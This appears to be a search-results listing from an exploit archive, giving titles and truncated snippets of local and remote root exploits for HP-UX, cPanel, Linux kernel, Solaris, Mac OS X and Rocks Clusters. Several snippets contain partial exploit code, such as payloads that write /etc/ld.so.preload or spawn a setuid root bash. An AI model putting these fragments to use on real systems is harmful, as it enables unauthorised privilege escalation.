792 matches found
HP-UX 11i - 'swmodify' Local Stack Overflow / Local Privilege Escalation
/ HP-UX swmodify buffer overflow exploit ======================================= HP-UX 'swmodify' contains an exploitable stack overflow in the handling of command line arguements. Specifically the problem occurs due to insufficent bounds checking in the "-S" optional arguement. 'swmodify' is...
HP-UX 11i - swpackage Local Stack Overflow Local Privilege Escalation
HP-UX 11i - swpackage Local Stack Overflow Local Privilege Escalation / HP-UX swpackage buffer overflow exploit ======================================= HP-UX 'swpackage' contains an exploitable stack overflow in the handling of command line arguements. Specifically the problem occurs due to...
HP-UX 11i (swpackage) Stack Overflow Local Root Exploit
Exploit for hp-ux platform in category local exploits ======================================================= HP-UX 11i swpackage Stack Overflow Local Root Exploit ======================================================= / HP-UX swpackage buffer overflow exploit...
MS Windows WebDav III remote root Exploit (xwdav)
No description provided by source. / IIS 5.0 WebDAV Exploit Xnuxer Lab By Schizoprenic, Copyright c 2003 WebDAV exploit without netcat or telnet and with pretty magic number as RET / include stdio.h include errno.h include string.h include stdlib.h include fcntl.h include sys/types.h include...
BeroFTPD 1.3.4(1) Linux x86 Remote Root Exploit
No description provided by source. / BeroFTPD 1.3.41 Linux x86 remote root exploit by qitest1 - 5/05/2001 BeroFTPD is an ftpd derived from wuftpd sources. This code exploits the format bug of the site exec cmd, well known to be present in wuftpd-2.6.0 and derived daemons. BeroFTPD 1.3.41 is the...
Solaris 10 libnspr LD_PRELOAD Arbitrary File Creation Local Root Exploit
Exploit for solaris platform in category local exploits ======================================================================== Solaris 10 libnspr LDPRELOAD Arbitrary File Creation Local Root Exploit ======================================================================== !/bin/sh $Id:...
NVIDIA UNIX driver -- arbitrary root code execution vulnerability
Rapid7 reports: The NVIDIA Binary Graphics Driver for Linux is vulnerable to a buffer overflow that allows an attacker to run arbitrary code as root. This bug can be exploited both locally or remotely via a remote X client or an X client which visits a malicious web page. A working proof-of-conce...
cPanel <= 10.8.x (cpwrap via mysqladmin) Local Root Exploit (php)
Exploit for unknown platform in category web applications ================================================================= cPanel cPanel Sorry Safe-mode Is On Script Not Work On This Server "; echo "Powered By Ashiyane Security Corporation www.Ashiyane.ir"; exit; $disablef =...
cpanel108x.txt
!/usr/bin/perl -w 10/01/06 - cPanel if/REMOTEUSER/ die "$cpwrap is patched.\n"; close CPWRAP; open STRICT, "strict.pm" or die "Can't open strict.pm: $!\n"; print STRICT "$e = "int mainsetreuid0,0;setregid0,0;system\\\"/bin/bash\\\";";\n"; print STRICT "system"/bin/echo -n...
Infecting Elf Binaries to Gain Local Root Exploit
Exploit for linux platform in category local exploits ================================================= Infecting Elf Binaries to Gain Local Root Exploit ================================================= gcc infR3.s -o infR3 strip infR3 find a writable binary example: ls ./infR3 /bin/ls when root...
cpexploit.txt
All cPanel versions which were released before August 23rd are vulnerable to a local root exploit. Exact version numbers are unclear. Doing a "ls -l /usr/local/cpanel/version" is a good way to determine the last time cPanel was updated. This exploit made the news when it was used to circulate an ...
liblesstif 2-0.93.94-4mdk - 'DEBUG_FILE' Local Privilege Escalation
!/bin/sh echo echo "mtink libXm local root exploit" echo " [email protected] " echo umask 000 export DEBUGFILE="/etc/ld.so.preload" cat /tmp/lib.c void initvoid if getuid!=0 && geteuid==0 setuid0; unlink"/etc/ld.so.preload"; execl"/bin/bash", "bash", 0; EOF /usr/bin/gcc -o /tmp/lib.o -c /tmp/lib.c...
Apple Mac OSX 10.3.8 - CF_CHARSET_PATH Local Buffer Overflow (2)
Apple Mac OSX 10.3.8 - CFCHARSETPATH Local Buffer Overflow 2 !/usr/bin/perl http://www.digitalmunition.com written by kf kflistsatdigitalmunitiondotcom Variant of CFCHARSETPATH a local root exploit by v9atfakehalo.us I was in the mood for some retro shit this morning, and I need root on some old...
Mac OS X <= 10.3.8 (CF_CHARSET_PATH) Local BOF Exploit (2)
Exploit for macOS platform in category local exploits ========================================================== Mac OS X = 10.3.8 CFCHARSETPATH Local BOF Exploit 2 ========================================================== !/usr/bin/perl http://www.digitalmunition.com written by kf...
rocksmountdirty.txt
!/bin/sh rocksmountdirty.sh: Rocks release =4.1 local root exploit make sure 'mount-loop' is in your path for this to work. coded by: [email protected] http://xavsec.blogspot.com echo "Rocks Clusters =4.1 mount-loop local root exploit by [email protected] http://xavsec.blogspot.com" echo...
Linux Kernel <= 2.6.17.4 (proc) Local Root Exploit
No description provided by source. / Author: h00lyshit Vulnerable: Linux 2.6 ALL Type of Vulnerability: Local Race Tested On : various distros Vendor Status: unknown Disclaimer: In no event shall the author be liable for any damages whatsoever arising out of or in connection with the use or sprea...
Rocks Clusters <= 4.1 (umount-loop) Local Root Exploit
No description provided by source. !/usr/bin/env python rocksumountdirty.py: Rocks release =4.1 local root exploit quick and nasty version of the exploit. make sure the . is writable and you clean up afterwards. ; coded by: [email protected] http://xavsec.blogspot.com x=import'os';c=x.getcwd...
Linux Kernel <= 2.6.17.4 (proc) Local Root Exploit
Exploit for linux platform in category local exploits ================================================== Linux Kernel Example: h00lyshit /usr/X11R6/lib/libethereal.so.0.0.1 if y0u dont have one, make big file 100MB in /tmp with dd and try to junk the cache e.g. cat /usr/lib/ /dev/null / include...
Rocks Clusters <= 4.1 (mount-loop) Local Root Exploit
No description provided by source. !/bin/sh rocksmountdirty.sh: Rocks release =4.1 local root exploit make sure 'mount-loop' is in your path for this to work. coded by: [email protected] http://xavsec.blogspot.com echo "Rocks Clusters =4.1 mount-loop local root exploit by [email protected]...
Rocks Clusters <= 4.1 (mount-loop) Local Root Exploit
Exploit for linux platform in category local exploits ===================================================== Rocks Clusters = 4.1 mount-loop Local Root Exploit ===================================================== !/bin/sh rocksmountdirty.sh: Rocks release =4.1 local root exploit make sure...